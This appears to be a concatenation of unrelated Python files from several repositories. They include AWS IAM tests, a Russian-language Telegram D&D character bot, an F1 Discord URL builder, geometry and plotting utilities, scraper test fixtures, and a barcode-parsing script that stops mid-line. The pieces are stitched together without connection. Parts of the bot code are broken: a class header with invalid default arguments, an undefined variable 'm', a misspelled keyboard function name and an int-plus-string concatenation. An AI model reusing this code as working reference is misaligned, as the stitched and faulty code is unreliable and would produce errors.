next(self.resource.get_secondary_attributes()) assert isinstance(result, SecondaryAttribute) assert result["EnableDnsSupport"] == {"Value": True} def test_get_subresources(self): result = next(self.role_resource.get_subresources()) assert str(result.urn) == "urn:aws:123456789012:us-east-1:iam:role_policy:test-role/test-role-policy" assert result.raw_data == { "PolicyDocument": { "Statement": {"Action": 
"s3:ListBucket", "Effect": "Allow", "Resource": "arn:aws:s3:::example_bucket"}, "Version": "2012-10-17", }, "PolicyName": "test-role-policy", "ResponseMetadata": { "HTTPHeaders": {"server": "amazon.com"}, "HTTPStatusCode": 200, "RequestId": ANY, "RetryAttempts": 0, }, "RoleName": "test-role", } def test_secondary_attribute_models(self): assert [x.name for x in self.role_resource.secondary_attribute_models] == [ "RoleInlinePolicyAttachments", "RoleManagedPolicyAttachments", ] def test_is_subresource(self): assert not self.role_resource.is_subresource assert self.role_policy_resource.is_subresource def test_id_parts(self): assert self.role_resource.id_parts == ["test-role"] assert self.role_policy_resource.id_parts == ["test-role", "test-role-policy"] def test_parent_resource_type(self): assert self.role_resource.parent_resource_type == "" assert self.role_policy_resource.parent_resource_type == "role" def test_resource_type_pascal(self): assert self.role_resource.resource_type_pascal == "Role" assert self.role_policy_resource.resource_type_pascal == "RolePolicy" egor5q/dnd-fight # -*- coding: utf-8 -*- import os import telebot import time import random import threading from emoji import emojize from telebot import types from pymongo import MongoClient import traceback token = os.environ['TELEGRAM_TOKEN'] bot = telebot.TeleBot(token) client=MongoClient(os.environ['database']) db=client.dnd users=db.users nowid = db.nowid spells = db.spells spells.insert_one({}) if 'barbarian' not in spells.find_one({}): spells.update_one({},{'$set':{'barbarian':{}, 'bard':{}, 'fighter':{}, 'wizard':{}, 'druid':{}, 'cleric':{}, 'warlock':{}, 'monk':{}, 'paladin':{}, 'rogue':{}, 'ranger':{}, 'sorcerer':{}}}) if nowid.find_one({}) == None: nowid.insert_one({'id':1}) base = { 'units':{}, 'alpha_access':False, 'current_stat':None, 'current_unit':None, 'spells':{} } classes = ['bard', 'barbarian', 'fighter', 'wizard', 'druid', 'cleric', 'warlock', 'monk', 'paladin', 'rogue', 'ranger', 'sorcerer'] races = ['elf', 'human', 'tiefling', 'half-elf', 'halfling', 'half-orc', 'dwarf', 'gnome'] # rangee: [дальность_применения, тип_цели] # duration: 0, если мгновенное # damage: [3, 6] = 3d6 class Spell(lvl = 0, casttime = 1, rangee = {'distance':30, 'target_type': 'target'}, duration = 1, savethrow = 'dexterity', damage = [3, 6], heal = [0, 0], actions = ['damage']): def __init__(self): self.lvl = lvl self.casttime = casttime # действия self.range = rangee # футы self.duration = duration # минуты self.savethrow = savethrow self.damage = damage self.heal = heal self.actions = actions @bot.message_handler(commands=['addspell']) def addspell(m): user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return spell = createspell() users.update_one({'id':user['id']},{'$set':{'spells.'+str(spell['id']):spell}}) bot.send_message(m.chat.id, 'Вы успешно создали заклинание! Теперь настройте его (/set_spell).') @bot.message_handler(commands=['create_unit']) def createunit(m): user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return unit = createunit(user) users.update_one({'id':user['id']},{'$set':{'units.'+str(unit['id']):unit}}) bot.send_message(m.chat.id, 'Вы успешно создали юнита! 
Теперь настройте его (/set_stats).') @bot.message_handler(commands=['set_stats']) def set_stats(m): if m.chat.id != m.from_user.id: bot.send_message(m.chat.id, 'Можно использовать только в личке!') return user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return kbs = [] kb = types.InlineKeyboardMarkup() for ids in user['units']: unit = user['units'][ids] kbs.append(types.InlineKeyboardButton(text = unit['name'], callback_data = str(unit['id'])+' edit')) i = 0 nextt = False toadd=[] while i < len(kbs): if nextt == True: kb.add(*toadd) toadd = [] toadd.append(kbs[i]) nextt = False else: toadd.append(kbs[i]) if i%2 == 1: nextt = True i+=1 bot.send_message(m.chat.id, 'Выберите юнита, которого хотите отредактировать.', reply_markup=kb) @bot.message_handler(commands=['set_spell']) def set_stats(m): if m.chat.id != m.from_user.id: bot.send_message(m.chat.id, 'Можно использовать только в личке!') return user = createuser(m) if not user['alpha_access']: bot.send_message(m.chat.id, 'У вас нет альфа-доступа! Пишите @Loshadkin.') return kbs = [] kb = types.InlineKeyboardMarkup() for ids in user['spells']: spell = user['spells'][ids] kbs.append(types.InlineKeyboardButton(text = spell['name'], callback_data = str(spell['id'])+' spell_manage')) i = 0 nextt = False toadd=[] while i < len(kbs): if nextt == True: kb.add(*toadd) toadd = [] toadd.append(kbs[i]) nextt = False else: toadd.append(kbs[i]) if i%2 == 1: nextt = True i+=1 bot.send_message(m.chat.id, 'Выберите спелл, который хотите отредактировать.', reply_markup=kb) @bot.message_handler(content_types = ['photo']) def msgsp(m): user = createuser(m) if user['current_stat'] != None and user['current_unit'] != None and m.from_user.id == m.chat.id: unit = user['units'][user['current_unit']] if user['current_stat'] == 'photo': users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']:m.photo[0].file_id}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, 'Новое фото установлено!') @bot.message_handler() def msgs(m): user = createuser(m) if user['current_stat'] != None and user['current_unit'] != None and m.from_user.id == m.chat.id: unit = user['units'][user['current_unit']] numbervalues = ['hp', 'maxhp', 'strenght', 'dexterity', 'constitution', 'intelligence', 'wisdom', 'charisma', 'armor_class', 'speed'] blist = ['inventory', 'spells', 'player', 'photo'] if user['current_stat'] not in blist: text = False if user['current_stat'] in numbervalues: test = True val = m.text if test: try: val = int(m.text) except: bot.send_message(m.chat.id, 'Нужно значение типа int!') return users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']:val}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, unit['name']+': успешно изменена характеристика "'+user['current_stat']+'" на "'+val+'"!') else: if user['current_stat'] == 'inventory': inv = [] t = m.text.split(', ') for ids in t: inv.append(ids) tt = '' for ids in inv: tt +=ids+', ' tt = tt[:len(tt)-2] users.update_one({'id':user['id']},{'$set':{'units.'+str(user['current_unit'])+'.'+user['current_stat']: inv}}) users.update_one({'id':user['id']},{'$set':{'current_stat':None, 'current_unit':None}}) bot.send_message(m.chat.id, unit['name']+': инвентарь юнита успешно изменён на '+tt+'!') 
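

# (Sketch, not part of the original bot) The repeated two-buttons-per-row loops
# in the set_stats and set_spell handlers above could be factored into a helper
# like this; `buttons` is any list of telebot InlineKeyboardButton objects and
# `build_keyboard` is a hypothetical name, not used elsewhere in this file.
def build_keyboard(buttons, per_row=2):
    kb = types.InlineKeyboardMarkup()
    for i in range(0, len(buttons), per_row):
        # InlineKeyboardMarkup.add() accepts several buttons at once,
        # which become one keyboard row here
        kb.add(*buttons[i:i + per_row])
    return kb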
########################################################## @bot.callback_query_handler(func=lambda call: True) def inline(call): user = createuser(call) if 'edit' in call.data: unit = user['units'][int(call.data.split(' ')[0])] if unit == None: bot.answer_callback_query(call.id, 'Такого юнита не существует!', show_alert = True) return kb = create_edit_kb(unit) bot.send_message(m.chat.id, 'Нажмите на характеристику для её изменения.', reply_markup=kb) elif 'change' in call.data and 'spell' not in call.data: blist = ['inventory', 'spells', 'player', 'photo'] numbervalues = ['hp', 'maxhp', 'strenght', 'dexterity', 'constitution', 'intelligence', 'wisdom', 'charisma', 'armor_class', 'speed', 'name'] what = call.data.split(' ')[1] unit = user['units'][int(call.data.split(' ')[2])] if unit == None: bot.answer_callback_query(call.id, 'Такого юнита не существует!', show_alert = True) return users.update_one({'id':user['id']},{'$set':{'current_unit':unit['id'], 'current_stat':what}}) if what not in blist: if what in numbervalues: bot.send_message(m.chat.id, 'Теперь пришлите мне новое значение характеристики "'+what+'".') else: if what == 'race': r = 'расы' alls = '' for ids in races: alls += '`'+ids+'` ' elif what == 'class': r = 'классы' alls = '' for ids in classes: alls += '`'+ids+'` ' bot.send_message(m.chat.id, 'Теперь пришлите мне новое значение характеристики "'+what+'".\n'+ 'Существующие '+r+': '+alls, parse_mode = 'markdown') else: if what == 'inventory': inv = '`' for ids in unit['inventory']: inv += ids+', ' inv = inv[:len(inv)-2] inv += '`' bot.send_message(m.chat.id, 'Теперь пришлите мне новый инвентарь, перечисляя предметы через запятую. Текущий '+ 'инвентарь: '+inv, parse_mode='markdown') elif what == 'photo': if unit['photo'] != None: bot.send_photo(m.chat.id, unit['photo'], caption = 'Текущая фотография юнита. Для изменения отправьте новое фото.') else: bot.send_message(m.chat.id, 'Фотография отсутствует. 
Для изменения отправьте новое фото.') ################################################ elif 'spell_manage' in call.data: spell = user['spells'][int(call.data.split(' ')[0])] if spell == None: bot.answer_callback_query(call.id, 'Такого спелла не существует!', show_alert = True) return kb = create_spell_kb(spell) bot.send_message(m.chat.id, 'Нажмите на характеристику для её изменения.', reply_markup=kb) def create_spell_kb(spell): kb = types.InlineKeyboardMarkup() kb.add(addkb(kb, 'Название: '+spell['name'], 'spell_change name '+str(spell['id']))) kb.add(addkb(kb, 'Классы: '+str(spell['classes']), 'spell_change classes '+str(spell['id']))) kb.add(addkb(kb, 'Описание: '+str(spell['description']), 'spell_change description '+str(spell['id']))) kb.add(addkb(kb, 'Уровень: '+str(spell['lvl']), 'spell_change lvl '+str(spell['id']))) kb.add(addkb(kb, 'Время каста: '+str(spell['casttime'])+' действий', 'spell_change casttime '+str(spell['id']))) kb.add(addkb(kb, 'Дальность применения: '+str(len(spell['range']))+' параметров', 'spell_change range '+str(spell['id']))) kb.add(addkb(kb, 'Длительность: '+str(spell['duration']), 'spell_change range '+str(spell['id']))) kb.add(addkb(kb, 'Спасбросок: '+str(spell['savethrow']), 'spell_change savethrow '+str(spell['id']))) kb.add(addkb(kb, 'Урон: '+str(spell['damage'][0])+'d'+str(spell['damage'][1]), 'spell_change damage '+str(spell['id']))) kb.add(addkb(kb, 'Лечение: '+str(spell['heal'][0])+'d'+str(spell['heal'][1]), 'spell_change heal '+str(spell['id']))) kb.add(addkb(kb, 'Эффекты спелла: '+str(len(spell['actions'])+' эффектов', 'spell_change actions '+str(spell['id']))) return kb def create_etit_kb(unit): player = users.find_one({'id':unit['player']}) if player != None: player = player['name']+' ('+str(player['id'])+')' kb = types.InlineKeyboardMarkup() kb.add(addkb(kb, 'Имя: '+unit['name'], 'change name '+str(unit['id']))) kb.add(addkb(kb, 'Класс: '+unit['class'], 'change class '+str(unit['id']))) kb.add(addkb(kb, 'Раса: '+unit['race'], 'change race '+str(unit['id']))) kb.add(addkb(kb, 'Хп: '+str(unit['hp']), 'change hp '+str(unit['id']))) kb.add(addkb(kb, 'Макс.хп: '+str(unit['maxhp']), 'change maxhp '+str(unit['id']))) kb.add(addkb(kb, 'Сила: '+str(unit['strenght']), 'change strenght '+str(unit['id']))) kb.add(addkb(kb, 'Ловкость: '+str(unit['dexterity']), 'change dexterity '+str(unit['id']))) kb.add(addkb(kb, 'Телосложение: '+str(unit['constitution']), 'change constitution '+str(unit['id']))) kb.add(addkb(kb, 'Интеллект: '+str(unit['intelligence']), 'change intelligence '+str(unit['id']))) kb.add(addkb(kb, 'Мудрость: '+str(unit['wisdom']), 'change wisdom '+str(unit['id']))) kb.add(addkb(kb, 'Харизма: '+str(unit['charisma']), 'change charisma '+str(unit['id']))) kb.add(addkb(kb, 'Класс брони: '+str(unit['armor_class']), 'change armor_class '+str(unit['id']))) kb.add(addkb(kb, 'Скорость (в футах): '+str(unit['speed']), 'change speed '+str(unit['id']))) kb.add(addkb(kb, 'Инвентарь: '+str(len(unit['inventory']))+' предметов', 'change inventory '+str(unit['id']))) kb.add(addkb(kb, 'Заклинания: '+str(len(unit['spells']))+' спеллов', 'change spells '+str(unit['id']))) kb.add(addkb(kb, 'Фото', 'change photo '+str(unit['id']))) return kb def createspell(): id=randomid() return { 'id':id, 'name':str(id), 'classes':['sorcerer', 'wizard'], 'description':'Описание спелла', 'lvl':0, 'casttime':1, 'range':{'distance':30, 'target_type': 'target'}, 'duration':1, 'savethrow':'dexterity', 'damage':[3, 6], 'heal':[0, 0], 'actions':['damage'] } def addkb(kb, text, 
calldata): return types.InlineKeyboardButton(text=text, callback_data = calldata) def createunit(user): maxx=20 minn=6 maxhp = random.randint(8, 20) return { 'id':randomid(), 'name':randomname(), 'class':randomclass(), 'race':randomrace(), 'hp':maxhp, 'maxhp':maxhp, 'strenght':random.randint(minn,maxx), 'dexterity':random.randint(minn,maxx), 'constitution':random.randint(minn,maxx), 'intelligence':random.randint(minn,maxx), 'wisdom':random.randint(minn,maxx), 'charisma':random.randint(minn,maxx), 'armor_class':random.randint(8,16), 'initiative':10, 'speed':30, 'photo':None, 'death_saves(success)':0, 'death_saves(fail)':0, 'spells':{}, 'inventory':[], 'current_weapon':None, 'owner':user['id'], 'player':None } def randomname(): names = ['', '', '', '', 'Холг', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'Вренн'] return random.choice(names) def randomclass(): return random.choice(classes) def randomrace(): return random.choice(races) def randomid(): id = nowid.find_one({})['id'] nowid.update_one({},{'$inc':{'id':1}}) return id+1 def createuser(m): user = users.find_one({'id':m.from_user.id}) if user == None: users.insert_one(createu(m)) user = users.find_one({'id':m.from_user.id}) return user def createu(m): d = {'id':m.from_user.id, 'name':m.from_user.first_name} for ids in base: d.update({ids:base[ids]}) return d def medit(message_text,chat_id, message_id,reply_markup=None,parse_mode=None): return bot.edit_message_text(chat_id=chat_id,message_id=message_id,text=message_text,reply_markup=reply_markup, parse_mode=parse_mode) for ids in users.find({}): for idss in base: if idss not in ids: users.update_one({'id':ids['id']},{'$set':{idss:base[idss]}}) print('7777') bot.polling(none_stop=True,timeout=600) StarostinV/plt-pack import sys from datetime import datetime as dt def get_metadata() -> dict: platform = sys.platform py_version = sys.version time = dt.utcnow().strftime('%d %B %Y %H:%M:%S') return dict(time=time, py_version=py_version, platform=platform) zmmaster/Formula1-DiscordBot0 import requests from requests.exceptions import HTTPError, ConnectionError, Timeout from datetime import date class UrlBuilder: base_url = "https://ergast.com/api/f1" today = date.today() current_year = today.year earliest_year = 1950 first_rnd = 1 last_rnd = 22 @staticmethod def season_checker(season, keyword=True): if keyword: if (season == "current"): return True return False elif ((UrlBuilder.earliest_year < season and season < UrlBuilder.current_year) and (f"{season}".isdigit())): return True else: return False @staticmethod def rnd_checker(rnd, keyword=True): if keyword: if (rnd == "next" or rnd == "last"): return True return False elif ((UrlBuilder.first_rnd < rnd and rnd < UrlBuilder.last_rnd) and (f"{rnd}".isdigit())): return True else: return False @staticmethod def is_alpha(endpoint_variable): return (f"{endpoint_variable}".isalpha()) @staticmethod def correct_format_helper(season, rnd): seasonkeyword = UrlBuilder.is_alpha(season) rndkeyword = UrlBuilder.is_alpha(rnd) return (UrlBuilder.season_checker(season, seasonkeyword) and UrlBuilder.rnd_checker(rnd, rndkeyword)) def url_builder(season="current", rnd="next"): endpoint = f"{UrlBuilder.base_url}/{season}/{rnd}.json" return endpoint class SendRequest: def make_request(endpoint): """ The exception format below was borrowed from an article on Real Python Link: https://realpython.com/python-requests/ Title: Python's Requests Library (Guide) Article author: """ try: r = requests.get(endpoint, timeout=5) # If the response was succesful, 
no Exception will be raised r.raise_for_status() except HTTPError as http_err: print(f'Http error occured: {http_err}') except ConnectionError as conct_err: print(f'Connection Error occured: {conct_err}') except Timeout as tout_err: print(f'Timeout Error occured: {tout_err}') except Exception as err: print(f'Other error occurred: {err}') else: print('Success!') if (__name__ == '__main__'): pass from math import pi, cos, sin class Vector: def __init__(self, x, y): self.x = x self.y = y def __add__(self, v): if not isinstance(v, Vector): return NotImplemented return Vector(self.x + v.x, self.y + v.y) def __sub__(self, v): if not isinstance(v, Vector): return NotImplemented return Vector(self.x - v.x, self.y - v.y) def cross(self, v): if not isinstance(v, Vector): return NotImplemented return self.x*v.y - self.y*v.x class Line: # ax + by + c = 0 def __init__(self, v1, v2): self.a = v2.y - v1.y self.b = v1.x - v2.x self.c = v2.cross(v1) def __call__(self, p): return self.a * p.x + self.b * p.y + self.c def intersection(self, other): # See e.g. https://en.wikipedia.org/wiki/Line%E2%80%93line_intersection#Using_homogeneous_coordinates if not isinstance(other, Line): return NotImplemented w = self.a * other.b - self.b * other.a return Vector( (self.b * other.c - self.c * other.b)/w, (self.c * other.a - self.a*other.c)/w ) def rectangle_vertices(cx, cy, w, h, r): angle = pi*r/180 dx = w/2 dy = h/2 dxcos = dx*cos(angle) dxsin = dx*sin(angle) dycos = dy*cos(angle) dysin = dy*sin(angle) return ( Vector(cx, cy) + Vector(-dxcos - -dysin, -dxsin + -dycos), Vector(cx, cy) + Vector( dxcos - -dysin, dxsin + -dycos), Vector(cx, cy) + Vector( dxcos - dysin, dxsin + dycos), Vector(cx, cy) + Vector(-dxcos - dysin, -dxsin + dycos) ) def intersection_area(r1, r2): # r1 and r2 are in (center, width, height, rotation) representation # First convert these into a sequence of vertices rect1 = rectangle_vertices(*r1) rect2 = rectangle_vertices(*r2) # Use the vertices of the first rectangle as # starting vertices of the intersection polygon. intersection = rect1 # Loop over the edges of the second rectangle for p, q in zip(rect2, rect2[1:] + rect2[:1]): if len(intersection) <= 2: break # No intersection line = Line(p, q) # Any point p with line(p) <= 0 is on the "inside" (or on the boundary), # any point p with line(p) > 0 is on the "outside". # Loop over the edges of the intersection polygon, # and determine which part is inside and which is outside. new_intersection = [] line_values = [line(t) for t in intersection] for s, t, s_value, t_value in zip( intersection, intersection[1:] + intersection[:1], line_values, line_values[1:] + line_values[:1]): if s_value <= 0: new_intersection.append(s) if s_value * t_value < 0: # Points are on opposite sides. # Add the intersection of the lines to new_intersection. intersection_point = line.intersection(Line(s, t)) new_intersection.append(intersection_point) intersection = new_intersection # Calculate area if len(intersection) <= 2: return 0 return 0.5 * sum(p.x*q.y - p.y*q.x for p, q in zip(intersection, intersection[1:] + intersection[:1]))modules/tools/mapshow/libs/subplot_st_main.py #!/usr/bin/env python3 ############################################################################### # Copyright 2017 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### class StMainSubplot: def __init__(self, ax, st_name): self.st_curve_line, = ax.plot([0], [0], "k.", lw=3, alpha=0.5) self.kernel_cruise_line, = ax.plot([0], [0], "g.", lw=3, alpha=0.5) self.kernel_follow_line, = ax.plot([0], [0], "y.", lw=3, alpha=0.5) self.obstacle_boundary_lines = [] self.obstacle_annotations = [] self.obstacle_boundary_size = 10 for i in range(self.obstacle_boundary_size): self.obstacle_boundary_lines.append( ax.plot([0], [0], "r-", lw=1, alpha=1)[0]) self.obstacle_annotations.append(ax.text(0, 0, "")) # self.st_name = planning_config_pb2.TaskType.Name( # planning_config_pb2.QP_SPLINE_ST_SPEED_OPTIMIZER) self.st_name = st_name ax.set_xlim(-3, 9) ax.set_ylim(-10, 220) ax.set_xlabel("t (second)") ax.set_ylabel("s (m)") ax.set_title(st_name) self.set_visible(False) def set_visible(self, visible): self.st_curve_line.set_visible(visible) self.kernel_cruise_line.set_visible(visible) self.kernel_follow_line.set_visible(visible) for line in self.obstacle_boundary_lines: line.set_visible(visible) for text in self.obstacle_annotations: text.set_visible(visible) def show(self, planning): self.set_visible(False) planning.st_data_lock.acquire() if self.st_name not in planning.st_data_boundary_s: planning.st_data_lock.release() return obstacles_boundary_s = planning.st_data_boundary_s[self.st_name] obstacles_boundary_t = planning.st_data_boundary_t[self.st_name] obstacles_type = planning.st_data_boundary_type[self.st_name] cnt = 1 for boundary_name in obstacles_boundary_s.keys(): if cnt >= self.obstacle_boundary_size: print("WARNING: number of path lines is more than " \ + self.obstacle_boundary_size) continue boundary = self.obstacle_boundary_lines[cnt] boundary.set_visible(True) boundary.set_xdata(obstacles_boundary_t[boundary_name]) boundary.set_ydata(obstacles_boundary_s[boundary_name]) center_t = 0 center_s = 0 for i in range(len(obstacles_boundary_t[boundary_name]) - 1): center_s += obstacles_boundary_s[boundary_name][i] center_t += obstacles_boundary_t[boundary_name][i] center_s /= float(len(obstacles_boundary_s[boundary_name]) - 1) center_t /= float(len(obstacles_boundary_t[boundary_name]) - 1) annotation = self.obstacle_annotations[cnt] annotation.set_visible(True) annotation.set_text(boundary_name + "_" + obstacles_type[boundary_name] .replace("ST_BOUNDARY_TYPE_", "")) annotation.set_x(center_t) annotation.set_y(center_s) cnt += 1 self.st_curve_line.set_visible(True) self.st_curve_line.set_xdata(planning.st_curve_t[self.st_name]) self.st_curve_line.set_ydata(planning.st_curve_s[self.st_name]) self.st_curve_line.set_label(self.st_name[0:5]) self.kernel_cruise_line.set_visible(True) self.kernel_cruise_line.set_xdata( planning.kernel_cruise_t[self.st_name]) self.kernel_cruise_line.set_ydata( planning.kernel_cruise_s[self.st_name]) self.kernel_follow_line.set_visible(True) self.kernel_follow_line.set_xdata( planning.kernel_follow_t[self.st_name]) self.kernel_follow_line.set_ydata( planning.kernel_follow_s[self.st_name]) planning.st_data_lock.release() def zobackogram(Sv, Pp, mu): import numpy as np 
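    # (Added note, not in the original) The ratio computed below follows from
    # frictional faulting theory: (S1 - Pp) / (S3 - Pp) <= (sqrt(mu^2 + 1) + mu)^2,
    # which gives the lower bound on Shmin and the upper bound on SHmax used to
    # draw the stress polygon.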
import matplotlib.pyplot as plt # ratio of S1-Pp to S3-Pp ratio = (np.sqrt((mu**2) + 1) + mu)**2 # lower limit of Shmin, from Sv Sh = ((Sv - Pp) / ratio) + Pp # upper limit of SHmax, from Sv and Pp SH = (ratio * (Sv - Pp)) + Pp # axes of plot Sv_x = np.arange(0, (SH + 10000), 10) Sv_y = Sv_x plt.figure(figsize=(10,10)) # plot Sv line and Sv data p1 = plt.plot(Sv_x, Sv_y, color='green') p2 = plt.plot(Sv, Sv, 'o', color='black') # for Normal Faulting (NF) regime nf_x = np.array([Sh, Sh, Sv, Sh]) nf_y = np.array([Sh, Sv, Sv, Sh]) nf = plt.plot(nf_x, nf_y, color='blue') # for Strike Slip (SS) regime ss_x = np.array([Sh, Sv, Sv, Sh]) ss_y = np.array([Sv, Sv, SH, Sv]) ss = plt.plot(ss_x, ss_y, color='red') # for Reverse Faulting (RF) regime rf_x = np.array([Sv, Sv, SH, Sv]) rf_y = np.array([Sv, SH, SH, Sv]) rf = plt.plot(rf_x, rf_y, color='black') plt.legend((p1[0], p2[0], nf[0], ss[0], rf[0]), ['Sv line', 'Sv data', 'Normal Faulting (NF) Polygon', 'Strike Slip (SS) Polygon', 'Reverse Faulting (RF) Polygon']) plt.title('Stress Polygons (Zoback-o-gram)') plt.xlabel('Shmin (psi)'); plt.ylabel('SHmax (psi)') plt.xlim(xmin=0); plt.ylim(ymin=0) plt.gca().set_aspect('equal') return(p1, p2, nf, ss, rf) import os import datetime import pytest from bs4 import BeautifulSoup from myfortune import AppConfig from myfortune import FujiTvScraper from myfortune import Mailer from myfortune import NipponTvScraper from myfortune import Scraper from myfortune import TbsScraper from myfortune import TvAsahiScraper def test_file(filename): path = os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', ) with open(os.path.join(path, filename), 'r') as f: return f.read() @pytest.fixture(scope='module') def fake_datetime(): return datetime.datetime(2020, 7, 17, 0, 0, 0) @pytest.fixture(scope='module') def fuji_tv_data(): return test_file('fuji_tv.html').encode('utf-8') @pytest.fixture(scope='module') def nippon_tv_data(): return test_file('nippon_tv.html').encode('utf-8') @pytest.fixture(scope='module') def tbs_data(): return test_file('tbs.html').encode('utf-8') @pytest.fixture(scope='module') def tv_asahi_data(): return test_file('tv_asahi.html').encode('utf-8') @pytest.fixture(scope='module') def dummy_cache(): return os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', 'dummy_cache.pickle' ) @pytest.fixture(scope='module') def dummy_config(): return os.path.join( os.path.dirname(os.path.realpath(__file__)), 'test_files', 'myfortune.json' ) @pytest.fixture def scraper(): return Scraper() @pytest.fixture def fuji_tv_scraper(fuji_tv_data): scraper = FujiTvScraper() scraper._soup = BeautifulSoup(fuji_tv_data, 'html.parser') return scraper @pytest.fixture def nippon_tv_scraper(nippon_tv_data): scraper = NipponTvScraper() scraper._soup = BeautifulSoup(nippon_tv_data, 'html.parser') return scraper @pytest.fixture def tbs_scraper(tbs_data): scraper = TbsScraper() scraper._soup = BeautifulSoup(tbs_data, 'html.parser') return scraper @pytest.fixture def tv_asahi_scraper(tv_asahi_data): scraper = TvAsahiScraper() scraper._soup = BeautifulSoup(tv_asahi_data, 'html.parser') return scraper @pytest.fixture def app_config(): return AppConfig() @pytest.fixture def mailer(): smtp_config = { 'username': 'bar@localhost', 'password': 'password', 'encryption': 'SSL', 'smtp_address': 'localhost', 'port': 1025 } return Mailer(smtp_config) Parallel-Seq/parse_barcode.py1-10 import sys import re import os import datetime import pickle import gzip import numpy as np import pandas as pd from multiprocessing 
import Process, Manager from generate_bc_dicts import free_divergence,write_pkl def get_min_edit_dists(bc,edit_dict,max_d=3): """Returns a list of nearest edit dist seqs Input 8nt barcode, edit_dist_dictionary Output , """ bc_matches = edit_dict[0][bc] edit_dist = 0 if (len(bc_matches)==0) and (max_d>=1): edit_dist+=1 bc_matches = edit_dict[1][bc] if (len(bc_matches)==0) and (max_d>=2): edit_dist+=1 bc_matches = edit_dict[2][bc] if (len(bc_matches)==0) and (max_d>=3): edit_dist+=1 bc_matches = edit_dict[3][bc] return bc_matches,edit_dist def split_fq(output_dir, prefix, nthreads): fastq1=output_dir+'/trimmed/'+prefix+'_R1.fq.gz' fastq2=output_dir+'/trimmed/'+prefix+'_R2.fq.gz' fq1 = gzip.open(fastq1,'rb') fq2 = gzip.open(fastq2,'rb') fq1_chunks = {} fq2_chunks = {} for i in range(nthreads): fq1_chunks[i] = open(output_dir + '/trimmed/'+prefix+'_R1.chunk%d.fastq' %(i+1),'w') fq2_chunks[i] = open(output_dir + '/trimmed/'+prefix+'_R2.chunk%d.fastq' %(i+1),'w') # Get the total number of aligned reads: with open(output_dir +'/trimmed/'+prefix+'.log') as f: log=f.read() try: num_reads = re.search("Pairs written.*\s+([\d,]+)\s[(].*\n", log).group(1) except: sys.exit("Invalid trim log file!") num_reads = int(num_reads.replace(',','')) # Number of reads per file. Round up to ensure we don't write (nthreads +1) files. reads_per_chunk = int(np.ceil(num_reads/nthreads)) c = 0 while True: seqname1 = fq1.readline().decode("utf-8") if not seqname1: break seq1 = fq1.readline().decode("utf-8") strand1 = fq1.readline().decode("utf-8") qual1 = fq1.readline().decode("utf-8") seqname2 = fq2.readline().decode("utf-8") seq2 = fq2.readline().decode("utf-8") strand2 = fq2.readline().decode("utf-8") qual2 = fq2.readline().decode("utf-8") chunk = int(np.floor(c/reads_per_chunk)) fq1_chunks[chunk].write(seqname1+seq1+strand1+qual1) fq2_chunks[chunk].write(seqname2+seq2+strand2+qual2) c+=1 for i in range(nthreads): fq1_chunks[i].close() fq2_chunks[i].close() fq1.close() fq2.close() def join_fq(output_dir, prefix, nthreads): files1 = [output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R1.chunk%d.fastq' %i for i in range(1,nthreads+1)] files2 = [output_dir +'/parse_bc/'+prefix+ '_tag_barcode_R2.chunk%d.fastq' %i for i in range(1,nthreads+1)] fout1=open(output_dir + '/parse_bc/'+prefix+ '_tag_barcode_R1.fastq', "w") fout2=open(output_dir + '/parse_bc/'+prefix+ '_tag_barcode_R2.fastq', "w") for f in files1: fin=open(f) fout1.write(fin.read()) fin.close() fout1.close() for f in files2: fin=open(f) fout2.write(fin.read()) fin.close() fout2.close() def preprocess_fastq_chunk(output_dir, prefix, bcset, bc4, counts, config, return_dict, chunk=None): """ get barcode """ parse_bc_dir=output_dir+'/parse_bc' if chunk is None: #not used fastq1=output_dir+'/trimmed/'+prefix+'_R1.fq.gz' fastq2=output_dir+'/trimmed/'+prefix+'_R2.fq.gz' fastq1_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R1.fastq' fastq2_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R2.fastq' else: fastq1=output_dir+'/trimmed/'+prefix+'_R1.chunk%d.fastq'%chunk fastq2=output_dir+'/trimmed/'+prefix+'_R2.chunk%d.fastq'%chunk fastq1_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R1.chunk%d.fastq'%chunk fastq2_out = parse_bc_dir +'/'+prefix+ '_tag_barcode_R2.chunk%d.fastq'%chunk umi_bc_len = config.umi_bc_len umi_bc_starts = config.umi_bc_starts tag_seq=config.tag_seq tag_start=config.tag_start tag_length=config.tag_length method=config.method bc_edit_dist=config.bc_edit_dist tag_edit_dist=config.tag_edit_dist bc_edit_dist1 = int(bc_edit_dist[0]) bc_edit_dist2 = 
